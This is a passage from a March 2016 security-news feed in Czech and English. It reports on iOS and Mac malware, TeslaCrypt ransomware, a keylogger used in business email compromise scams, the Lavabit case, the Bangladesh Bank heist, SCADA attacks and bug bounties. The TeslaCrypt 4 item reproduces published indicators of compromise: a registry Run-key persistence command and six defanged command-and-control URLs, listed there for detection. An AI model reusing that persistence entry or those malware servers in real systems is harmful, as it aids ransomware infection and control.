„Pro komunitu Androidářů představuje záplatování podobných chyb obzvlášť velkou výzvu. Na vývojáře i výrobce je vyvíjen velký tlak, aby takové chyby rychle napravovali,“ říká Chris Eng, viceprezident společnosti Veracode.
Nový trojský kůň terorizuje uživatele iPhonů a iPadů
21.3.2016 Viry
Počítačoví piráti se v poslední době zaměřují na uživatele Applu stále častěji. V uplynulých týdnech trápil uživatele operačního systému vyděračský virus KeRanger, nově se trojský kůň AceDeceiver zaměřuje na chytré telefony a počítačové tablety s logem nakousnutého jablka. Upozornil na to server Hot for Security.
Nový škodlivý kód objevili výzkumníci ze společnosti Palo Alto Networks. Podle nich jde mimochodem o vůbec prvního trojského koně pro platformu iOS, tedy pro mobilní operační systém společnosti Apple.
Bezpečnostní experti upozorňují na to, že nezvaný návštěvník se dokáže šířit i na zařízeních, na kterých nebyl proveden tzv. jailbreak. Jde v podstatě o odemčení chytrého telefonu nebo počítačového tabletu, aby do něj bylo možné instalovat aplikaci i z neoficiálních zdrojů.
Právě tak se totiž škodlivé kódy na iPhonech a iPadech šířily nejčastěji. Trojský kůň AceDeceiver však jailbreak nepotřebuje, zopakujme, že se dokáže šířit i na neodemčených přístrojích.
Zadní vrátka do systému
V nich pak dokáže udělat poměrně velkou neplechu. Otevře totiž kyberzločincům zadní vrátka do systému, čímž jim zpřístupní nejen nastavení, ale také uživatelská data.
Jak se tedy záškodník do mobilu nebo tabletu dostane? Počítačoví piráti spoléhají na to, že si uživatelé budou chtít stahovat aplikace nejen prostřednictvím svého mobilního telefonu, ale také prostřednictvím počítače s Windows, ke kterému se iPhone či iPad jednoduše připojí prostřednictvím aplikace iTunes.
AceDeceiver se podle výzkumníků z Palo Alto Networks šíří už od poloviny loňského roku, objeven byl však až nyní. Aktuálně mají výzkumníci k dispozici tři programy, které tohoto záškodníka obsahují a nabízely se prostřednictvím oficiálního obchodu s App Store.
Bezpečnostní experti zástupce společnosti Apple na výskyt nebezpečných aplikací upozornili ještě před zveřejněním celé kauzy. V současnosti tak již není nakažené programy možné stáhnout.
Nabízí se ale otázka, zda se výzkumníkům podařilo odhalit všechny nakažené aplikace. Nebo zda naopak ještě nějaká číhá na uživatele v obchodu App Store.
Vyděrači cílí na Mac OS X
Zkraje března se počítačoví piráti zaměřili také na majitele počítačů s operačním systémem Mac OS X. Virem KeRanger mohli uživatelé své stroje nakazit, pokud do nich nainstalovali aplikaci pro stahování torrentů Transmission. Právě v ní se nezvaný návštěvník ukrýval.
První tři dny si oběti vyděračského viru patrně ani nevšimly, že je něco v nepořádku. Zůstal totiž schovaný na pozadí a vyčkával na svou příležitost. Teprve po zmiňovaných 72 hodinách se aktivoval a začal v operačním systému Mac OS X pěknou neplechu.
Stejně jako na platformě Windows zašifruje uložená data na pevném disku. Útočníci pak za jejich zpřístupnění požadují výkupné ve výši 10 000 korun.
Hacking Tesla Model S, too much noise around a great research
21.3.2016 Hacking
Last week at the CeBIT the Lookout’s Co-Founder and CTO Kevin Mahaffey talked about hacking Tesla Model S providing indications on possible countermeasures.
Last week at the CeBIT conference held in Hanover, the Lookout’s Co-Founder and CTO Kevin Mahaffey talked about hacking Tesla Model S providing indications on possible countermeasures. Unfortunately, many security professionals provided highlighted that Mahaffey has forgotten to mention half of his team, looking like he was taking the credit to himself.
These type of work made by researchers should be seen as “doing the world a service” since researchers are making cars more secure, of course, they are hacking them, but they are also finding solutions to the problems.
Tesla, besides having great cars, have also great policies that ensure that the car security is a company high priority, for this reason, they are encouraging the hacker community to hack their vehicles and disclose vulnerabilities they would find.
The reason why Kevin Mahaffey and Marc Rogers focused in hacking Tesla models, is that the company is making new model, build from scratch, and these type of cars will be common everywhere in the near future.
Even if everything made by Kevin and his team looks easy, it took them many years of research to get to the point in the presentation that they can “control” the Model S.
In the las year Kevin and Marc gave made a presentation at the DEFCON conference, the findings of their research helped Tesla to discover problems in his cars and contributed to improve the image of the company that is perceived by the experts as a research-friendly company.
Coming back to the presentation in CeBIT on hacking Tesla, many people took the title “Why I Hacked the Tesla Model S” and focused in the “I” part, looking like Kevin Mahaffey was pushing all the credit to himself.
CSO tried to reach Marc Rogers to talk about this problem, but Rogers declined to comment. No one at Lookout was aware of any problem related to the presentation or presentation title, and when the issue came to their attention, they blamed CeBIT.
In an e-mail a spokesperson of Lookout said:
“disappointing that CeBIT positioned Kevin and Marc’s research in such a way that excluded recognition of Marc’s extremely hard work.”
“It was absolutely a collaboration between the two of them and Kevin does make that clear in his CeBIT presentation,”
And if you see that presentation you know it’s true, at a certain point kevin says:
“Why did I undertake this research? It was myself Kevin Mahaffey and my research partner Marc Rogers, we’ve been working on this project for several years…”
In addition, Kevin showed a photo of Marc during the process of stopping the Model S.
In another e-mail exchange with CSO, Kevin says he offered an apology and stated that he feels terrible that Rogers would feel slighted by the incident.
Lookout says they were “caught the misleading title, and apologize failing to do so. “ and already asked CeBIT to correct the article/presentation.
Let me suggest see the interesting presentation made at the Cebit conference.
A iOS zero-day allows iCloud photos and videos decryption
21.3.2016 iOS
A group of researchers found an iOS zero-day that would let a skilled attacker decrypt photos and videos that were sent as secure instant messages.
The bad news is that Matthew Green, a professor at Johns Hopkins University revealed that a zero-day vulnerability in iOS encryption allows skilled attackers to decrypt intercepted iMessages, the good news is that the flaw is very hard to exploit.
Green explains that he suspected the flaw when reading Apple documentation related to the encryption scheme implemented in its messaging system.
The popular expert Matthew Green hasn’t provided the details of the exploit to give the opportunity for Apple for fixing it. The expert also added that the flaw would not have helped the US government in the case of the San Bernardino shutter’s iPhone.
The hacking technique could be used by law enforcement only to access photos and videos sent by suspects using iMessage.
“This specific flaw in Apple’s iMessage platform likely would not have helped the FBI pull data from an iPhone recovered in December’s San Bernardino, Calif., terrorist attack, but it shatters the notion that strong commercial encryption has left no opening for law enforcement and hackers, said Matthew D. Green, a computer science professor at Johns Hopkins University who led the research team.” states The Washington Post that interviewed Green.
“Even Apple, with all their skills — and they have terrific cryptographers — wasn’t able to quite get this right,” said Green.“So it scares me that we’re having this conversation about adding back doors to encryption when we can’t even get basic encryption right.”
Green explained that with the support of his group of experts, composed of Ian Miers, Christina Garman, Gabriel Kaptchuk, and Michael Rushanan could guess the key that could be used to decrypt photos and videos stored in the iCloud.
The team of researchers wrote an application that emulated an Apple server and then targeted an encrypted photo stored on the iCloud. The software sent key digit guesses to an iPhone running an old version of iOS, which in turn indicated when each key of its 64 digits was correct.
Green highlighted that its attack technique could very dangerous if conducted by a persistent attacker, like a nation-state attacker.
The iOS 9.3 beta version seems to be unaffected and will be released as stable shortly.
Apple partially fixed the zero-day vulnerability with the iOS 9 release.
Hackers brought down the websites of principal Swedish Newspapers
21.3.2016 Hacking
The online editions of principal Swedish newspapers were knocked out for several hours by a cyber attack during the weekend.
The websites if a Swedish were shut down in the weekend due to an “extremely dangerous and serious” cyber attack.
The websites hit by the hackers are the Dagens Nyheter, Svenska Dagbladet, Expressen, Aftonbladet, Dagens Industri, Sydsvenskan and Helsingborgs Dagblad. The website went down on Saturday evening from about 19:00 GMT until about 22:00 GMT.
The news was confirmed by the head of the Swedish Media Publishers’ Association, Jeanette Gustafsdotter, in an interview with the Swedish news agency TT.
“To threaten access to news coverage is a threat to democracy,” she said.
At the time I was writing no one has claimed responsibility for the cyber attack and there are no details about the attacks. Experts speculate that threat actors coordinated a distributed denial-of-services (DDoS) attacks against the websites of the Swedish media agencies.
Immediately before the attacks a Twitter account posted the following messages:
“The following days attacks against the Swedish government and media spreading false propaganda will be targeted” tweeted @_notJ.
“This is what happends when you spread false propaganda. Aftonbladet.se #offline @Aftonbladet” states another Tweet.
The Swedish Police and the intelligence are investigating the case. According to several sources on the Internet, the attacks originated from Russia.
Olympic Vision BEC attacks target businesses worldwide with keyloggers
20.3.2016 Crime
Trend Micro discovered a Business Email Compromise Campaign leveraging on the Olympic Vision keylogger that targets Middle East and Asia Pacific Companies.
A new malware-based campaign is targeting key employees from companies in the US, Middle East and Asia. The attackers are using malware in a classic business email compromise (BEC) attack in order to hijacking the email accounts of the victims and authorize financial transactions on their behalf.
The attacks have been traced back to Lagos and Kuala Lumpur.
“The Business Email Compromise (BEC) is a sophisticated scam targeting businesses working with foreign suppliers and/or businesses that regularly perform wire transfer payments. Formerly known as the Man-in-the-E-mail Scam, the BEC was renamed to focus on the “business angle” of this scam and to avoid confusion with another unrelated scam.” reports the statement issued in 2015 by Internet Crime Complaint Center (IC3) and the FBI.
In this last wave of attacks uncovered by experts at antivirus firm Trend Micro that hackers attempted to gain control of victims’ accounts to trick other employees, suppliers or business partners to perform wire transfer payments to accounts controlled by the crooks.
The cyber criminals targeted key employees at companies from 18 countries by spreading a commercial keylogger named Olympic Vision. The attackers sent to the victims malicious emails masqueraded as messages from business partners which pretend to provide information related to alleged problems occurred with a recent bank transfer of invoice.
“Olympic Vision is a keylogger malware involved in an ongoing Business Email Compromise (BEC) campaign targeting 18 companies in the US, Middle East and Asia, the majority of which coming from the two latter regions (22%, 39% and 39% respectively). Business Email Compromise attacks involve spear phishing/social engineering techniques to infect key employees’ systems with info-stealing malware and intrude upon business dealings/transactions. ” states a report published by Trend Micro.
The researchers explained that the Olympic Vision keylogger is very cheap, it is available on the black market for $25, but the experts highlight that it isn’t a very advanced threat.
“Olympic Vision is the fourth malware we’ve seen used in Business Email Compromise campaigns, after Predator Pain, Limitless, and HawkEye. Similar to other BEC malware, Olympic Vision is capable of stealing a variety of information from its target, and comes with a small price tag – its toolkit can be bought for $25. ” Trend Micro wrote in a blog post.
“Olympic Vision is not advanced by any means. Like Predator Pain and Limitless, keyloggers that have been used for the very same purpose in previous BEC campaigns, it performs its main function – that is, to log keystrokes and take screenshots for the purpose of stealing personal information – well and without unneeded complexity.” continues the report.
Once installed on the victim’s machine, Olympic Vision collects information about the system configuration, login credentials saved in several applications (i.e. Email clients, browsers, FTP programs and instant messaging applications) and key strokes. The malware also gathers network information and images and text in the clipboard.
Despite the threat is not particularly advanced, it is perfect to collect information that is used by attacker to understand the accounting workflows of the targeted firms.
“We looked at the trail of Olympic Vision keyloggers being used in the wild to check for organized activity, and were able to trace the identities of the actors, and positively identified two Nigerian cybercriminals — one operating from Lagos, and the other from Kuala Lumpur,” continues the blog post.
Business Email Compromise is a serious threat to businesses that causes losses for thousand million dollars every year.
Redaction error reveals Feds ordered Lavabit to spy on Snowden
20.3.2016 Security
A redaction error in court-ordered release of the Lavabit case files confirmed that Edward Snowden was the target of the FBI.
Lavabit was an encrypted webmail service founded in 2004 by Ladar Levison, it closed on August 8, 2013 after the US authorities ordered it to turn over its Secure Sockets Layer (SSL) private keys to order government surveillance activities. The US Government was interested in spying on the Edward Snowden‘s emails.
Now a redaction error in court-ordered release of Lavabit case files confirmed that Edward Snowden was the target of the FBI that caused the termination of the secure email service.
We have now the certainty that Snowden was using the Lavabit email service and that FBI drove the company into closure because it refused to serve the US Government’s requests.
The US Government ordered to install a surveillance implant on the Lavabit servers and later to turn over Lavabit’s encryption keys allowing the Feds to access Snowden’s messages. The court order also revealed that the US Government ordered not to disclose the surveillance activity to third-party entities.
After a few weeks of legal dispute, Levison shuttered Lavabit refusing to become not become complicit in criminal surveillance operated by the US Government.
“After 38 days of legal fighting, a court appearance, subpoena, appeals and being found in contempt of court, Levison abruptly shuttered Lavabit citing government interference and stating that he would not become “complicit in crimes against the American people”.” reported the Guardian.
US authorities recently revealed the mysterious circumstances behind the Lavabit shut down by publishing a collection of case files that were not correctly redacted allowing to discover the target of the FBI activity, the email address Ed_Snowden@lavabit.com.
The document was integrally published by Cryptome, it is visible the Snowden’s email address was left unredacted.
The documents were publicly disclosed in the result of Levison’s battle against the US Government, he filed a motion in December that prompted the court to order the release of files related the Lavabit case.
The Lavabit founder plans to reveal what it really happened, but he is still under order not to reveal the facts … meantime the redaction error leaves no doubt about the real intent of the FBI in the Lavabit case.
Ransomware TeslaCrypt 3.0.1 posouvá vydírání dále, už nepůjde prolomit
20.3.2016 Viry
Ransomware TeslaCrypt 3.0.1 posouvá vydírání dále, už nepůjde prolomitDnes, Milan Šurkala, aktualitaVyděračský malware je na vzestupu, stává se mnohem častější hrozbou než v minulosti. Nová verze TeslaCrypt 3.0.1 opravuje chyby předchozí varianty a nyní už bude bez zaplacení výkupného nemožné se dostat k původním datům.
V posledních měsících a letech zaznamenáváme výrazný nárůst ransomware, což je vyděračský software, který zašifruje veškerá data na disku oběti a požaduje výkupné za jejich odemčení. TeslaCrypt je jeden z nejzákeřnějších a jeho nová verze 3.0.1 opravila chyby těch předchozích. Dle odborníků v oblasti bezpečnosti je šifrování tak silné, že nelze prolomit žádnou metodou (brute force je díky časové náročnosti nemyslitelný).
Minulé verze softwaru uchovaly klíč k odemčení na počítači oběti a vzniklo několik aplikací, které dokázaly zašifrovaná data odemknout (TeslaCrack, TeslaDecrypt, TeslaDecoder). Nová verze vytvoří šifrovací klíč, který je jedinečný pro každý počítač, zašifruje jím data, ale poté jej odešle na server útočníka a na postiženém počítači jej smaže. Pak nezbývá než zaplatit, přičemž není zaručeno, že útočníci vaše data skutečně rozšifrují. Situace je ještě o to horší, že ransomware často proklouzne antivirovým programům. Musíte si tedy dávat pozor na přílohy v e-mailech a ideální je také si nechávat zálohy důležitých dat.
Security Researcher Goes Missing, Who Investigated Bangladesh Bank Hack
20.3.2016 Hacking
Tanvir Hassan Zoha, a 34-year-old security researcher, who spoke to media on the $81 Million Bangladesh Bank cyber theft, has gone missing since Wednesday night, just days after accusing Bangladesh's central bank officials of negligence.
Zoha was investigating a recent cyber attack on Bangladesh's central bank that let hackers stole $81 Million from the banks' Federal Reserve bank account.
Though the hackers tried to steal $1 Billion from the bank, a simple typo prevented the full heist.
During his investigation, Zoha believed the Hackers, who are still unknown, had installed Malware on the bank's computer systems few weeks before the heist that allowed them to obtain credentials needed for payment transfers.
With the help of those credentials, the unknown hackers transferred large sums from Bangladesh's United States account to fraudulent accounts based in the Philippines and Sri Lanka.
However, at the same time, Zoha accused senior officials at Bangladesh central bank of gross negligence and weak security procedures that eventually facilitated the largest bank heist in the country.
The Central bank's governor Atiur Rahman, along with two of his deputy governors, had to quit his job over the scandal, hugely embarrassing the government and raising alarm over the security of Bangladesh's foreign exchange reserves of over US$27 Billion.
However, when the investigation was still going on, Zoha disappeared Wednesday night, while coming home with one of his friends, according to sources close to Zoha's family.
While speaking to media in the wake of the massive cyber attack, Zoha identified himself as the ICT (Information and Communication Technology) Division's cyber security expert who had worked with various government agencies in the past.
Soon after Zoha's disappearance, the government officials put out a statement but did not provide more details besides the fact that they opened an investigation.
Zoha's family members suspect that the comments Zoha made about the carelessness of bank’s officials on the Bank heist to the press on March 11 are the cause of his disappearance.
Hackers stole data from the Swiss People’s Party
20.3.2016 Hacking
The Swiss People’s Party confirmed that they have been the target of hackers who have stolen the personal data of over 50,000 individuals.
A group of hackers, which calls itself NSHC, claims to have hacked the Switzerland’s largest party, the conservative Swiss People’s Party (SVP), and stolen the personal data of over 50,000 individuals.
The cracked archive includes the names and email addresses of Swiss People’s Party supporters.
The NSHC have hacked the Swiss People’s Party to raise awareness about Switzerland’s lack of protection against cyber attacks.
Representatives of the Swiss People’s Party confirmed to 20 Minuten daily that the systems of the party were hit by a cyber attack but.
“Apparently it’s hackers succeeded in the database of svp.ch penetrate and gain access to various data, including e-mail addresses. A group that calls itself NSHC and understood as ‘Grey Hats’ has, the editors received from inside-channels.ch she wanted to show the attack, that Switzerland is not sufficiently protected against cyber attacks.” reported the website inside-it.ch.
According to the inside-it.ch website, the NSHC hacker group also launched DDoS against several Swiss online shops and the Swiss Federal Railways website (SBB) this week.
“The Swiss Federal Railways website was hard to access on Monday afternoon for about an hour and in the evening for around one and a half hours due to a DDoS attack,” Swiss Federal Railways spokesman Daniele Pallecchi told to the Swiss news agency.
According to Pascal Lamia, the head of the government’s Reporting and Analysis Center for Information Assurance (also known as MELANI), the attack on the Swiss People’s Party is not linked with cyber attacks recently observed against small enterprises and online shops.
“There is no connection with the chopped SVP sites including the DDoS attacks on web shops,” said Lamia.
The experts at MELANI confirmed to have no news about the NSHC group.
MELANI suggests people and businesses to check whether their email addresses have been hacked though an online tool available at https://www.checktool.ch.
Bored With Chess? Here's How To Play Basketball in Facebook Messenger
19.3.2016 Safety
Hope all of you have enjoyed the Game of Chess in the Facebook Messenger.
But if you're quite bored playing Chess or not really good at the game, then you probably felt a bit excited about Facebook's recent inclusion of a little Basketball mini-game into Messenger.
Now you can play Basketball through Facebook Messenger, just by typing in the Basketball emoji and sending to one of your friends. This would enable a secret Basketball mini-game between you and your friend.
Here's How to Play Basketball:
Just locate the basketball emoji from your emoji list, send to one of your friends and click it to start the game.
Once sent, you would be taken to the Basketball court in a pure white background, where there is no sidebars of any friend suggestions or any promotional ads; only appears a basketball and a hoop, nothing else!
All you have to do:
Just Swipe up and Toss the basketball into the hoop.
A single swipe on your phone in the direction of the hoop to bask in the ball. Facebook also encourages your gameplay with various emojis after each basket.
On successful basket, Game appreciates your gameplay by displaying various emojis like Thumbs Up, Hands Up, Claps and Smiles. On a miss, Game warns you by showing emojis like "Surprised", "Feared," and similar.
Messenger will also display your scores in between, based on your successful baskets. Your goal is to challenge your friend to see who can get the most consecutive baskets.
Video Demonstration
You can watch the Video Demonstration of Facebook Hidden Basketball game below:
To play this game, the Facebook users should have the latest version of Messenger installed on their mobile phone.
The addition of such mini-games into Facebook's messaging platform would be a loneliness breaker.
As this game had been unveiled after a couple of weeks of Chess, let's hope Facebook would integrate more games like caroms or snooker in its upcoming rollouts.
Anonymous claims to leak Trump ’s personal info under #OpWhiteRose
19.3.2016 Hacking
The Anonymous Hacker collective claims to publish Donald Trump’s personal information, including Social Security Number and addresses.
Alleged members of the Anonymous collective have leaked Donald Trump’s already public “private” phone numbers and other information online. The hackers have leaked also addresses, including the one of the Palm Beach residence in Florida, and social security number as part of the anti-Trump operation dubbed #OpWhiteRose.
Anonymous called the new campaign #OpWhiteRose, after a non-violent resistance group in Nazi Germany.
anonymous vs Donald Trump Operation WhiteRose
Rumors online confirm that members of Anonymous have data dumped Trump’s sensitive information, including detailed information about the Trump’s personal agent (Tracy Brennan) and legal representatives (Manatt Phelps & Phillips), whose phone numbers have now “gained publicity.”
“These are provided for informational purposes only,” states an Anonymous spokesman in a video published by the collective. “… That might be able to assist you all in independently investigating this would-be dictator.”
Analyzing the leaked data it is possible to note that released information was already publicly available, the Trump’s private phone number was shared by the presidential candidate in August on Twitter.
This week, Anonymous declared total war on Trump and his campaign, the hacker collective plans to coordinate a series of attacks on Trump’s web sites starting April 1, the April Fool’s Day.
“We have been watching you for a long time and what we’ve seen is deeply disturbing. You don’t stand for anything but your personal greed and power.”
“This is a call to arms. Shut down his websites, research and expose what he doesn’t want the public to know. We need you to dismantle his campaign and sabotage his brand.”“We need to dismantle his campaign and sabotage his brand,” said the Anonymous spokesman.
“We need to dismantle his campaign and sabotage his brand,” said Athe nonymous spokesman.
A few weeks ago, alleged members of the Anonymous group hacked the Donald Trump ‘s voicemails. Journalist at Gawker received an email by the hackers containing recordings from Donald Trump ‘s voicemail inbox.
The hacktivist group first threatened Trump with war in December, when he said he would look to ban all Muslims from entering the United States.
The data were published on Pastebit.
Apple Engineers say they may Quit if ordered to Unlock iPhone by FBI
19.3.2016 Apple
Apple Vs. FBI battle over mobile encryption case is taking more twists and turns with every day pass by.
On one hand, the US Department of Justice (DOJ) is boldly warning Apple that it might compel the company to hand over the source code of its full iOS operating system along with the private electronic signature needed to run a modified iOS version on an iPhone, if…
…Apple does not help the Federal Bureau of Investigation (FBI) unlock iPhone 5C belonging to one of the San Bernardino terrorists.
And on the other hand, Apple CEO Tim Cook is evident on his part, saying that the FBI wants the company to effectively create the "software equivalent of cancer" that would likely open up all iPhones to malicious hackers.
Now, some Apple engineers who actually develop the iPhone encryption technology could refuse to help the law enforcement break security measures on iPhone, even if Apple as a company decides to cooperate with the FBI.
Must Read: FBI Director – What If Apple Engineers are Kidnapped and Forced to Write (Exploit) Code?
Apple Emplyees to Quit their Jobs
Citing more than a half-dozen current and former Apple engineers, The New York Times report claims that the engineers may refuse the work or even "quit their jobs" if a court order compels them to create a backdoor for the very software they once worked to secure.
"Apple employees are already discussing what they will do if ordered to help law enforcement authorities," reads the report. "Some say they may balk at the work, while others may even quit their high-paying jobs rather than undermine the security of the software they have already created."
Apple previously said that building a new backdoored version of iOS to satisfy the FBI's demand would require up to a month of work and a team of 6-10 engineers, naturally Apple's top software engineers.
Also Read: Apple is working on New iPhone Even It Can't Hack.
However, Apple employees said they already have "a good idea who those employees would be." They include:
A former aerospace engineer who developed software for the iPhone, iPad and Apple TV.
A senior quality-assurance engineer who is an expert "bug catcher" with experience in testing Apple products.
An employee specializes in security architecture for the operating systems powering Apple products including iPhone, Mac and Apple TV.
The FBI wants Apple assistant to help the authorities bypass security mechanisms on the San Bernardino shooter Syed Farook's iPhone 5C so that they can extract data from the phone.
Given that the San Bernardino case is currently working its way through the courts and that no one is prepared to stand down, the possibility that Apple might have to comply with the orders is probably years away.
Be aware the unbreakable TeslaCrypt 4 was detected in the wild
19.3.2016 Virus
According to the experts at Heimdal Security firm, the ransomware Teslacrypt 4 arrived and it is infecting systems in the wild.
According to the experts at Heimdal Security, the fourth version of the infamous Teslacrypt ransomware has just been launched. Teslacrypt 4 implements new functionalities and is more stable of previous versions, stability, it also fixed various bugs, including one related to encryption of large data files. In the previous variants, files larger than 4 GB would get permanently damaged when the ransomware tried to encrypt them.
Teslacrypt 4 used RSA 4096 for data encryption, this makes impossible to recover data encrypted by the ransomware.
“Consequently, the encrypted data will be impossible to recover, which can determine information loss if the victim doesn’t have a backup for the affected data.” states a report published by Heimdal Security.
The bad news for the victims is that the TeslaDecoder tool used to rescue the files encrypted by the previous variants of the ransomware no longer works with Teslacrypt 4.0.
Victims of the Teslacryt 4 ransomware have to possibility to recover information, they can only restore files from a previous backup or pay the ransom with no guarantee of success.
Researchers spotted TeslaCrypt 4 in the wild, crooks used drive-by attacks to spread the ransomware leveraging on the Angler exloit kit.
The researchers already blocked more than 600 domains hosting the Angler EK in just one day. It has been estimated that daily average of domain spreading Angler EK blocked by the security firsm will reach soon 1200 domains per day, on average.
Teslacrypt 4 could be also used by attackers to harvest user’s data, including the “MachineGuid”, “DigitalProductID” and “SystemBiosDate” .
Experts at Heimdal Security have published the following Indicators of Compromise for the Teslacrypt 4.0:
%UserProfile%\Desktop\RECOVER[%5 random signs%].html
%UserProfile%\Desktop\RECOVER[%5 random signs %].png
%UserProfile%\Desktop\RECOVER[%5 random signs %].txt %UserProfile%\Documents\[random file name].exe %UserProfile%\Documents\recover_file.txt
TeslaCrypt 4 also creates the following value in the registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\_[random name] C:\Windows\SYSTEM32\CMD.EXE /C START %user account%\Documents\[random name].exe
The current list of Teslacrypt 4 Control & Command servers is the folowing:
http://commonsenseprotection[.]com/phsys.php
http://ebookstoreforyou[.]com/phsys.php
http://esbook[.]com/phsys.php
http://exaltation[.]info/plugins/phsys.php
http://hmgame[.]net/phsys.php
http://shampooherbal[.]com/phsys.php
This new variant of TeslaCrypt demosntrates the rapid evolution of the threat that first appeared in March 2015, meanwhile the version 2.o appeared in the wild in July 2015 and the TeslaCrypt 3.0 in January 2016.
SCADA hacking – Hackers with ability to cut the power is a real threat
19.3.2016 Hacking
The Ukranian power blackout has demonstrated the worrying effects of the SCADA hacking, other countries like UK fear similar attacks.
All the warnings from security experts throughout the years have unfortunately been disregarded, when it comes to the hackers’ threats in strategical spots, such as that of power generation. As a result, hackers have acted according to their own agenda and they have taken the world by storm.
As a result, hackers have acted according to their own agenda and they have taken the world by storm. On 23 December 2015, Ukraine suffered from an overall power blackout and that caused great distress to the people. Prykarpattyaoblenergo lost more than 30 substations, causing havoc in return. And the most frustrating thing of them all: the power stations have not yet been completely fixed. The reason is that the malware used by hackers in Ukraine for the power outing erased key files.
What does this say about security online?
The reason is that the malware used by hackers in Ukraine for the power outing erased key files. What does this say about security online?
The malware used is called “Killdisk” and was the outcome of a well-organized effort to gain control over the computers of the stations. Files appeared to the people working for the power company, attached by their “friends” – making it easier for them to open. Instead of files sent by their friends, the malware was installed into the computers and caused all these grave consequences.
On the bright side, this must have taken a lot of time and therefore, it is not the main tactic used by hackers in similar cases. However, it is always possible to happen again!
The bad news is that there are alternative ways for hackers to get inside similar systems, according to Sergey Gordeychik, who helps with Scada Strangelove, the community of experts working on discovering the faults of ICS systems.
“We can discover more than 80,000 different kinds of ICS systems connected to the internet directly,” Gordeychik told the BBC.
As a result, the ICS systems do not have the power to defend themselves against an attack. This is really frustrating, as there are ways for them to enhance online security and avoid these phenomena. The purpose of Scada Strangelove, according to Mr. Gordeychik, aims at changing that:
“The main idea is to raise awareness and to force vendors to create more secure-by-design systems.”
UK infrastructure is being scrutinized by Crest these days, trying to identify such potential threats online. According to what Ian Glover from Crest said:
“The single biggest vulnerability is connecting poorly protected corporate IT to operational technologies,” and so this is where they have focused on. “It’s much easier to exploit the corporate IT because there are so many tools you can download and use to do that,”
Of course, the aim of every security researcher out there in the UK is to enhance online security and raise awareness on such a threatening phenomenon that could blow up the structure of a whole country within minutes. Although there is a reasonable ground of worrying about what can happen in case of SCADA hacking, proper capability and intent can lead to sufficient defense against hacking threats for the UK and the world – hopefully!
How to Make $100,000? Just Hack Google Chromebook
19.3.2016 Hacking
Yes, you could earn $100,000 if you have the hacking skills and love to play with electronics and gadgets.
Google has doubled its top bug bounty for hackers who can crack its Chromebook or Chromebox machine over the Web.
So if you want to get a big fat check from Google, you must have the ability to hack a Chromebook remotely, that means your exploit must be delivered via a Web page.
How to Earn $100,000 from Google
The Chrome security team announced Monday that the top Prize for hacking Chromebook remotely has now been increased from $50,000 at $100,000 after nobody managed to successfully hack its Chromebook laptops last year.
The Top bug bounty will be payable to the first person – the one who executes a 'persistent compromise' of the Chromebook while the machine is in Guest Mode.
In other words, the hacker must be able to compromise the Chromebook when the machine is in a locked-down state to ensure its user privacy.
Moreover, the hack must still work even when the system is reset.
"Last year we introduced $50,000 rewards for the persistent compromise of a Chromebook in guest mode," the Google Security Blog reads.
"Since we introduced the $50,000 reward, we have not had a successful submission. Great research deserves great awards, so we're putting up a standing [6-figure] sum, available all year round with no quotas and no maximum reward pool."
Bug bounties have become an essential part of information security and have been offered by major Silicon Valley companies to hackers and security researchers who discover vulnerabilities in their products or services.
Last year, Google paid out more than $2,000,000 in bug bounties overall to hackers and researchers who found bugs across its services – including $12,000 to Sanmay Ved, an Amazon employee, who managed to buy Google.com domain.
So Keep Hunting, Keep Earning!
The Best Way to Send and Receive End-to-End Encrypted Emails
19.3.2016 Security
How many of you know the fact that your daily e-mails are passaged through a deep espionage filter?
This was unknown until the whistleblower Edward Snowden broke all the surveillance secrets, which made privacy and security important for all Internet users than ever before.
I often get asked "How to send encrypted email?", "How can I protect my emails from prying eyes?" and "Which is the best encrypted email service?".
Although, there are a number of encryption tools that offers encrypted email service to ensure that no one can see what you are sending to someone else.
One such tool to send encrypted emails is PGP (Pretty Good Privacy), an encryption tool designed to protect users’ emails from snooping.
However, setting up a PGP Environment for non-tech users is quite a difficult task, so more than 97% of the Internet users, including government officials, are still communicating via unencrypted email services i.e. Gmail, Yahoo, and other.
But here is good news for all those non-techies, but privacy-conscious Internet users, who wish to use encrypted e-mail communication without any hassle.
Solution — ProtonMail.
ProtonMail, developed by CERN and MIT scientists, is a free, open source and end-to-end encrypted email service that offers the simplest and best way to maintain secure communications to keep user's personal data secure.
ProtonMail Now Available for iOS and Android Users
secure-encrypted-email-service-providers
ProtonMail has been invite-only since 2014, but now the email service has made itself available to everyone and launched new mobile apps.
If you opt for a free account, you'll get all of the basic features including:
A smart-looking app to access your end-to-end encrypted emails easily
500MB of storage capacity
Sending 150 Messages per day
Two-factor authentication to access your encrypted email inbox
To increase storage capacity, you can purchase ProtonMail's paid accounts.
NOTE – Always remember your password to decrypt the email inbox. Once forgot, you would no longer retrieve your encrypted emails.
Key Features:
secure-encrypted-email-service-providers-security
Even if someone intercepts your communication, he/she can not read your conversations because all emails you send or receive with other ProtonMail users are automatically encrypted end-to-end by the service.
In addition, for communicating with non-ProtonMail email addresses i.e. Gmail users, all you need to do is:
Create a message
Just click the encryption button
Set a random password
Once done, your encrypted email recipient will get a link to the message with a prompt to enter his/her same password in order to read it.
Another friendly feature that ProtonMail offers is Self-destructing emails. All you need to do is set an expiration date for an encrypted email you send, and it will get self-deleted from the recipient’s inbox once the date arrives.
Why ProtonMail won't have to comply with American Laws?
In a previous article, I explained that ProtonMail is based in Switzerland, so it won't have to comply with American courts’ demands to provide users data.
In worst case, if a Swiss court ordered ProtonMail to provide data, they will get only the heaps of encrypted data as the company doesn’t store the encryption keys.
ProtonMail has gained an enormous amount of popularity during its developing stages.
ProtonMail encrypts the data on the browser before it communicates with the server, therefore only encrypted data is stored in the email service servers, making it significantly more secure for those looking for an extra layer of privacy.
Feel free to email our team at thehackernews@protonmail.com.
FBI by mohla špehovat lidi pomocí kamery v mobilu, varuje Apple
19.3.2016 Hrozby
O sporu mezi společností Apple a vyšetřovateli z FBI, který se týká odblokování iPhonu zabijáka ze San Bernardina, bude už příští týden rozhodovat soud v USA. Viceprezident počítačového gigantu pro software a služby Eddy Cue nyní upozornil, že konečný verdikt ve prospěch FBI by mohl vytvořit velmi nebezpečný precedens, který by mohl přinést například špehování lidí na dálku pomocí kamery v mobilu.
„Když nás donutí udělat nový systém se ‚zadními vrátky‘, jak to bude pokračovat dál?,“ prohlásil Cue podle serveru Apple Insider.
